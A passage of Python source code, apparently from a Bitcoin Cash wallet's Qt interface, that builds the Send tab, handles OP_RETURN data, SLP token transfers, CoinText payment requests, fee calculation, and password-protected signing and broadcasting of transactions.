self.payto_e.addWidget(qmark_help_but, index=0)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter(self.payto_e)
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('&Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
description_label.setBuddy(self.message_e)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg_opreturn = ( _('OP_RETURN data (optional).') + '\n\n'
+ _('Posts a PERMANENT note to the BCH blockchain as part of this transaction.')
+ '\n\n' + _('If you specify OP_RETURN text, you may leave the \'Pay to\' field blank.') )
self.opreturn_label = HelpLabel(_('&OP_RETURN'), msg_opreturn)
grid.addWidget(self.opreturn_label, 3, 0)
self.message_opreturn_e = MyLineEdit()
self.opreturn_label.setBuddy(self.message_opreturn_e)
hbox = QHBoxLayout()
hbox.addWidget(self.message_opreturn_e)
self.opreturn_rawhex_cb = QCheckBox(_('&Raw hex script'))
self.opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
hbox.addWidget(self.opreturn_rawhex_cb)
grid.addLayout(hbox, 3 , 1, 1, -1)
self.send_tab_opreturn_widgets = [
self.message_opreturn_e,
self.opreturn_rawhex_cb,
self.opreturn_label,
]
self.from_label = QLabel(_('&From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_label.setBuddy(self.from_list)
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
if self.is_slp_wallet:
msg = _('Token Amount to be sent.') + '\n\n' \
+ _("To enable make sure 'Address Mode' is set to SLP.") + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
self.slp_amount_label = HelpLabel(_('Token Amount'), msg)
msg = _('Select the SLP token to send.')
self.slp_token_type_label = HelpLabel(_('Token Type'), msg)
grid.addWidget(self.slp_token_type_label, 5, 0)
grid.addWidget(self.token_type_combo, 5, 1)
grid.addWidget(self.slp_amount_label, 6, 0)
hbox = QHBoxLayout()
self.amount_e.setMinimumWidth(195)
self.slp_amount_e.setMinimumWidth(195)
self.slp_amount_e.textEdited.connect(self.update_fee)
hbox.addWidget(self.slp_amount_e)
self.slp_max_button = EnterButton(_("Max"), self.slp_spend_max)
hbox.addWidget(self.slp_max_button)
grid.addLayout(hbox, 6, 1)
self.slp_extra_bch_cb = QCheckBox(_('Also send BCH?'))
self.slp_extra_bch_cb.clicked.connect(self.on_slp_extra_bch)
self.slp_extra_bch_cb.setHidden(True)
grid.addWidget(self.slp_extra_bch_cb, 6, 2)
self.slp_send_tab_widgets += [
self.slp_max_button, self.slp_extra_bch_cb
]
msg = _('BCH amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
self.amount_label = HelpLabel(_('BCH &Amount'), msg)
self.amount_label.setBuddy(self.amount_e)
grid.addWidget(self.amount_label, 7, 0)
hbox = QHBoxLayout()
hbox.addWidget(self.amount_e)
self.max_button = EnterButton(_("&Max"), self.spend_max)
self.max_button.setCheckable(True)
hbox.addWidget(self.max_button)
grid.addLayout(hbox, 7, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 7, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
msg = _('Bitcoin Cash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('F&ee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_e_label.setBuddy(self.fee_slider)
self.fee_slider.setFixedWidth(140)
self.fee_custom_lbl = HelpLabel(self.get_custom_fee_text(),
_('This is the fee rate that will be used for this transaction.')
+ "\n\n" + _('It is calculated from the Custom Fee Rate in preferences, but can be overridden from the manual fee edit on this form (if enabled).')
+ "\n\n" + _('Generally, a fee of 1.0 sats/B is a good minimal rate to ensure your transaction will make it into the next block.'))
self.fee_custom_lbl.setFixedWidth(140)
self.fee_slider_mogrifier()
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
grid.addWidget(self.fee_e_label, 9, 0)
hbox = QHBoxLayout()
hbox.addWidget(self.fee_slider)
hbox.addWidget(self.fee_custom_lbl)
hbox.addWidget(self.fee_e)
hbox.addStretch(1)
grid.addLayout(hbox, 9, 1)
self.preview_button = EnterButton(_("&Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("&Send"), self.do_send)
self.cointext_button = EnterButton(_("Coin&Text"), self.do_cointext)
self.cointext_button.setToolTip(_('Process CoinText, transforming it into a BIP70 payment request.'))
self.clear_button = EnterButton(_("&Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
buttons.addWidget(self.cointext_button)
buttons.addStretch(1)
grid.addLayout(buttons, 11, 1, 1, 3)
self.payto_e.textChanged.connect(self.update_buttons_on_seed) # hide/unhide cointext button, etc
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textChanged.connect(self.update_fee)
self.message_opreturn_e.editingFinished.connect(self.update_fee)
self.opreturn_rawhex_cb.stateChanged.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
if not self.slp_token_id:
enabled = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enabled)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
if self.is_slp_wallet:
hasError = entry_changed_slp()
if hasError == False:
entry_changed_bch()
else:
entry_changed_bch()
def entry_changed_bch():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough BCH" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
slp = self.wallet.get_slp_locked_balance()
if slp > 0:
text += " (" + self.format_amount(slp).strip() + " BCH held in tokens)"
extra = run_hook("not_enough_funds_extra", self)
if isinstance(extra, str) and extra:
text += " ({})".format(extra)
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
opret_color = ColorScheme.DEFAULT
if self.op_return_toolong:
opret_color = ColorScheme.RED
text = _("OP_RETURN message too large, needs to be no longer than 220 bytes") + (", " if text else "") + text
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.message_opreturn_e.setStyleSheet(opret_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textEdited.connect(entry_changed)
self.message_opreturn_e.editingFinished.connect(entry_changed)
self.opreturn_rawhex_cb.stateChanged.connect(entry_changed)
if self.is_slp_wallet:
self.slp_amount_e.textChanged.connect(entry_changed)
self.slp_amount_e.editingFinished.connect(entry_changed)
def entry_changed_slp():
if self.token_type_combo.currentData():
text = ""
name = self.wallet.token_types.get(self.slp_token_id)['name']
decimals = self.wallet.token_types.get(self.slp_token_id)['decimals']
if self.not_enough_funds_slp or self.not_enough_unfrozen_funds_slp:
bal_avail, x, x, x, frozen_amt = self.wallet.get_slp_token_balance(self.slp_token_id, { 'user_config': { 'confirmed_only': False }})
del x
if self.not_enough_funds_slp:
amt_color = ColorScheme.RED
text = "Not enough " + \
name + " tokens (" + \
format_satoshis_plain_nofloat(bal_avail, decimals) + " valid"
if self.config.get('confirmed_only', False):
conf_bal_avail = self.wallet.get_slp_token_balance(self.slp_token_id, self.config)[0]
unconf_bal = bal_avail - conf_bal_avail
if unconf_bal > 0:
text += ", " + format_satoshis_plain_nofloat(unconf_bal, decimals) + " unconfirmed)"
else:
text += ")"
else:
text += ")"
elif self.not_enough_unfrozen_funds_slp:
amt_color = ColorScheme.RED
text = "Not enough unfrozen " + name + " tokens (" + \
format_satoshis_plain_nofloat(bal_avail, decimals) + " valid, " + \
format_satoshis_plain_nofloat(frozen_amt, decimals) + " frozen)"
elif self.slp_amount_e.isModified():
amt_color = ColorScheme.DEFAULT
else:
amt_color = ColorScheme.BLUE
try:
if self.slp_amount_e.get_amount() > (2 ** 64) - 1:
amt_color = ColorScheme.RED
maxqty = format_satoshis_plain_nofloat((2 ** 64) - 1, self.wallet.token_types.get(self.slp_token_id)['decimals'])
text = _('Token output quantity is too large. Maximum {maxqty}.').format(maxqty=maxqty)
except TypeError:
pass
self.statusBar().showMessage(text)
self.slp_amount_e.setStyleSheet(amt_color.as_stylesheet())
if text != "":
return True
return False
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
self.invoice_list.chkVisible()
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.max_button.setChecked(True)
self.do_update_fee()
def slp_spend_max(self):
self.slp_amount_e.setAmount(self.wallet.get_slp_token_balance(self.slp_token_id, self.config)[3])
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
@staticmethod
def output_for_opreturn_stringdata(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
pushes = op_return.split('<push>')
script = "OP_RETURN"
for data in pushes:
if data.startswith("<hex>"):
data = data.replace("<hex>", "")
elif data.startswith("<empty>"):
pass
else:
data = data.encode('utf-8').hex()
script = script + " " + data
scriptBuffer = ScriptOutput.from_string(script)
if len(scriptBuffer.script) > 223:
raise OPReturnTooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
amount = 0
return (TYPE_SCRIPT, scriptBuffer, amount)
@staticmethod
def output_for_opreturn_rawhex(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturnError(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturnTooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput(op_return_script), amount)
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
bch_outputs = []
token_output_amts = []
self.not_enough_funds = False
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
fee_rate = None
if self.is_slp_wallet:
slp_amount = self.slp_amount_e.get_amount()
if amount is None and slp_amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.statusBar().showMessage('')
return
else:
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.statusBar().showMessage('')
return
try:
selected_slp_coins = []
if self.slp_token_id:
amt = slp_amount or 0
selected_slp_coins, slp_op_return_msg = SlpCoinChooser.select_coins(self.wallet, self.slp_token_id, amt, self.config)
if slp_op_return_msg:
bch_outputs = [ slp_op_return_msg ]
token_output_amts = slp.SlpMessage.parseSlpOutputScript(bch_outputs[0][1]).op_return_fields['token_output']
for amt in token_output_amts:
# just grab a dummy address for this fee calculation - safe for imported_privkey wallets
bch_outputs.append((TYPE_ADDRESS, self.wallet.get_addresses()[0], 546))
bch_payto_outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if bch_payto_outputs and bch_payto_outputs[0][2]:
bch_outputs.extend(bch_payto_outputs)
elif self.slp_token_id and amount and not bch_payto_outputs:
_type, addr = self.get_payto_or_dummy()
bch_outputs.append((_type, addr, amount))
if not bch_outputs:
_type, addr = self.get_payto_or_dummy()
bch_outputs.append((_type, addr, amount))
if not self.slp_token_id:
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if (opreturn_message != '' and opreturn_message is not None):
if self.opreturn_rawhex_cb.isChecked():
bch_outputs.insert(0, self.output_for_opreturn_rawhex(opreturn_message))
else:
bch_outputs.insert(0, self.output_for_opreturn_stringdata(opreturn_message))
fee = self.fee_e.get_amount() if freeze_fee else None
tx = self.wallet.make_unsigned_transaction(self.get_coins(isInvoice = False), bch_outputs, self.config, fee, mandatory_coins=selected_slp_coins)
if self.slp_token_id:
self.wallet.check_sufficient_slp_balance(slp.SlpMessage.parseSlpOutputScript(slp_op_return_msg[1]), self.config)
self.not_enough_funds = False
self.op_return_toolong = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except NotEnoughFundsSlp:
self.not_enough_funds_slp = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except NotEnoughUnfrozenFundsSlp:
self.not_enough_unfrozen_funds_slp = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except OPReturnTooLarge:
self.op_return_toolong = True
return
except OPReturnError as e:
self.statusBar().showMessage(str(e))
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
if not self.slp_token_id or len(token_output_amts) > 0:
self.fee_e.setAmount(fee)
if self.max_button.isChecked():
amount = tx.output_value()
if self.is_slp_wallet:
amount = tx.output_value() - len(token_output_amts) * 546
self.amount_e.setAmount(amount)
if fee is not None:
fee_rate = fee / tx.estimated_size()
self.fee_slider_mogrifier(self.get_custom_fee_text(fee_rate))
def fee_slider_mogrifier(self, text = None):
fee_slider_hidden = self.config.has_custom_fee_rate()
self.fee_slider.setHidden(fee_slider_hidden)
self.fee_custom_lbl.setHidden(not fee_slider_hidden)
if text is not None: self.fee_custom_lbl.setText(text)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
if not item:
return
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x['prevout_hash']
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
x['prevout_n'], x['address'])
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
on_pw_cancel = kwargs.pop('on_pw_cancel', None)
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
if callable(on_pw_cancel):
on_pw_cancel()
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self, preview=False):
bch_outputs = []
selected_slp_coins = []
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if self.slp_token_id:
if self.slp_amount_e.get_amount() == 0 or self.slp_amount_e.get_amount() is None:
self.show_message(_("No SLP token amount provided."))
return
try:
""" Guard against multiline 'Pay To' field """
if self.payto_e.is_multiline():
self.show_error(_("Too many receivers listed.\n\nCurrently this wallet only supports a single SLP token receiver."))
return
""" Guard against bad address encoding """
if not self.payto_e.payto_address:
self.show_error(_("Receiver SLP address is missing."))
return
""" Require SLPADDR prefix in 'Pay To' field. """
if networks.net.SLPADDR_PREFIX not in self.payto_e.address_string_for_slp_check:
self.show_error(_("Address provided is not in SLP Address format.\n\nThe address should be encoded using 'simpleledger:' or 'slptest:' URI prefix."))
return
amt = self.slp_amount_e.get_amount()
selected_slp_coins, slp_op_return_msg = SlpCoinChooser.select_coins(self.wallet, self.slp_token_id, amt, self.config)
if slp_op_return_msg:
bch_outputs = [ slp_op_return_msg ]
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
except (NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp) as e:
self.show_error(str(e))
return
isInvoice = False
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
if self.slp_token_id:
self.show_error('BIP-70 Payment requests are not yet working for SLP tokens.')
return
isInvoice = True
bch_outputs.extend(self.payment_request.get_outputs())
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
if self.slp_token_id:
_type, _addr = self.payto_e.payto_address
bch_outputs.append((_type, _addr, 546))
if self.payto_e.is_alias and not self.payto_e.validated:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
coins = self.get_coins(isInvoice=isInvoice)
""" SLP: Add an additional token change output """
if self.slp_token_id:
change_addr = None
token_outputs = slp.SlpMessage.parseSlpOutputScript(bch_outputs[0][1]).op_return_fields['token_output']
if len(token_outputs) > 1 and len(bch_outputs) < len(token_outputs):
""" start of logic copied from wallet.py """
addrs = self.wallet.get_change_addresses()[-self.wallet.gap_limit_for_change:]
if self.wallet.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.wallet.get_num_tx(addr) == 0]
if not change_addrs:
import random
change_addrs = [random.choice(addrs)]
change_addr = change_addrs[0]
elif len(change_addrs) > 1:
change_addr = change_addrs[1]
else:
change_addr = change_addrs[0]
elif coins:
change_addr = coins[0]['address']
else:
change_addr = self.wallet.get_addresses()[0]
bch_outputs.append((TYPE_ADDRESS, change_addr, 546))
# add normal BCH amounts
if not self.payment_request and self.amount_e.get_amount():
bch_outputs.extend(self.payto_e.get_outputs(self.max_button.isChecked()))
""" Only Allow OP_RETURN if SLP is disabled. """
if not self.slp_token_id:
try:
# handle op_return if specified and enabled
opreturn_message = self.message_opreturn_e.text()
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
bch_outputs.append(self.output_for_opreturn_rawhex(opreturn_message))
else:
bch_outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
if not bch_outputs:
self.show_error(_('Enter receiver address (No BCH outputs).'))
return
for _type, addr, amount in bch_outputs:
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
return bch_outputs, fee, label, coins, selected_slp_coins
_cointext_popup_kill_tab_changed_connection = None
def do_cointext(self):
''' This is called by the cointext button 'clicked' signal and it
initiates the processing of the cointext URL. This should only be
called if self.payto_e.cointext is not None, otherwise it will do
nothing. '''
if self.payto_e.cointext and not self.payment_request:
if self.gui_object.warn_if_no_network(self):
return
phone = self.payto_e.cointext
sats = self.amount_e.get_amount()
if sats:
url = "https://pay.cointext.io/p/{}/{}".format(phone, sats)
def get_cointext_pr():
# Runs in thread
self.print_error("CoinText URL", url)
pr = paymentrequest.get_payment_request(url) # raises on error
return pr
def on_success(pr):
# Runs in main thread
if pr:
if pr.error:
self.print_error("CoinText ERROR", pr.error)
self.show_error(_("There was an error processing the CoinText. Please check the phone number and try again."))
return
self.print_error("CoinText RESULT", repr(pr))
self.prepare_for_payment_request()
def show_popup():
if not self.send_button.isVisible():
# likely a watching-only wallet, in which case
# showing the popup label for the send button
# leads to unspecified position for the button
return
show_it = partial(
ShowPopupLabel,
text=_("Please review payment before sending CoinText"),
target=self.send_button, timeout=15000.0,
name="CoinTextPopup",
pointer_position=PopupWidget.LeftSide,
activation_hides=True, track_target=True,
dark_mode = ColorScheme.dark_scheme
)
if not self._cointext_popup_kill_tab_changed_connection:
# this ensures that if user changes tabs, the popup dies
# ... it is only connected once per instance lifetime
self._cointext_popup_kill_tab_changed_connection = self.tabs.currentChanged.connect(lambda: KillPopupLabel("CoinTextPopup"))
QTimer.singleShot(0, show_it)
pr.request_ok_callback = show_popup
self.on_pr(pr)
def on_error(exc):
self.print_error("CoinText EXCEPTION", repr(exc))
self.on_error(exc)
WaitingDialog(self.top_level_window(),
_("Retrieving CoinText info, please wait ..."),
get_cointext_pr, on_success, on_error)
else:
self.show_error(_('CoinText: Please specify an amount'))
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab(preview=preview)
if not r:
return
outputs, fee, tx_desc, coins, slp_coins = r
if self.slp_token_id:
try:
self.wallet.check_sufficient_slp_balance(slp.SlpMessage.parseSlpOutputScript(outputs[0][1]), self.config)
except slp.SlpInvalidOutputMessage:
self.show_message(_("No token outputs available.\n\nIf you have unconfirmed tokens wait 1 confirmation or turn off 'Spend only confirmed coins' in preferences, and try again."))
return
except NotEnoughFundsSlp:
self.show_message(_("Token balance too low."))
return
except NotEnoughUnfrozenFundsSlp:
self.show_message(_("Unfrozen SLP token balance is too low. Unfreeze some of the token coins associated with with this token."))
return
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee, mandatory_coins=slp_coins)
except NotEnoughFunds:
self.show_message(_("Insufficient BCH balance"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
#self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
#return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
if self.slp_token_id:
slp_amt_str = format_satoshis_plain_nofloat(self.slp_amount_e.get_amount(), self.wallet.token_types.get(self.slp_token_id)['decimals'])
slp_name = self.wallet.token_types[self.slp_token_id]['name']
msg = [
_("BCH amount to be sent") + ": " + self.format_amount_and_units(amount),
"\nToken amount to be sent" + ": " + slp_amt_str + " " + slp_name,
_("\nMining fee") + ": " + self.format_amount_and_units(fee),
]
else:
msg = [
_("\nAmount to be sent") + ": " + self.format_amount_and_units(amount),
_("\nMining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("\nAdditional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
# IN THE FUTURE IF WE WANT TO APPEND SOMETHING IN THE MSG ABOUT THE FEE, CODE IS COMMENTED OUT:
#if fee > confirm_rate * tx.estimated_size() / 1000:
# msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if (fee < (tx.estimated_size())):
msg.append(_('\nWarning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm."))
tx.ephemeral['warned_low_fee_already'] = True
if self.config.get('enable_opreturn') and self.message_opreturn_e.text():
msg.append(_("\nYou are using an OP_RETURN message. This gets permanently written to the blockchain."))
if self.wallet.has_password():
msg.append("")
msg.append(_("\nEnter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('\nProceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx, tx_desc)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password, *, slp_coins_to_burn=None, slp_amt_to_burn=None):
self.sign_tx_with_password(tx, callback, password, slp_coins_to_burn=slp_coins_to_burn, slp_amt_to_burn=slp_amt_to_burn)
def sign_tx_with_password(self, tx, callback, password, *, slp_coins_to_burn=None, slp_amt_to_burn=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# check transaction SLP validity before signing
try:
assert SlpTransactionChecker.check_tx_slp(self.wallet, tx, coins_to_burn=slp_coins_to_burn, amt_to_burn=slp_amt_to_burn)
except (Exception, AssertionError) as e:
self.show_warning(str(e))
return
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc, *, callback=None):
def broadcast_thread():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
if pr:
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
if not ack_status:
if ack_msg == "no url":
# "no url" hard-coded in send_payment method
# it means merchant doesn't need the tx sent to him
# since he didn't specify a POST url.
# so we just broadcast and rely on that result status.
ack_msg = None
else:
return False, ack_msg
# at this point either ack_status is True or there is "no url"
# and we proceed anyway with the broadcast
status, msg = self.network.broadcast_transaction(tx)
# figure out what to return...
msg = ack_msg or msg # prefer the merchant's ack_msg over the broadcast msg, but fallback to broadcast msg if no ack_msg.
status = bool(ack_status or status) # if both broadcast and merchant ACK failed -- it's a failure. if either succeeded -- it's a success
if status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
else:
# Not a PR, just broadcast.
status, msg = self.network.broadcast_transaction(tx)
return status, msg
# Check fee and warn if it's below 1.0 sats/B (and not warned already)
fee = None
try: fee = tx.get_fee()
except: pass # no fee info available for tx
# Check fee >= size otherwise warn. FIXME: If someday network relay
# rules change to be other than 1.0 sats/B minimum, this code needs
# to be changed.
if (isinstance(fee, int) and tx.is_complete() and fee < len(str(tx))//2
and not tx.ephemeral.get('warned_low_fee_already')):
msg = _('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm.") + "\n\n" + _("Proceed?")
if not self.question(msg, title = _("Low Fee")):
return
# /end fee check
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
if self.gui_object.warn_if_no_network(self):
# Don't allow a useless broadcast when in offline mode. Previous to this we were getting an exception on broadcast.
return
elif not self.network.is_connected():
# Don't allow a potentially very slow broadcast when obviously not connected.
parent.show_error(_("Not connected"))
return
def broadcast_done(result):
# GUI thread
cb_result = False
if result:
status, msg = result
if status:
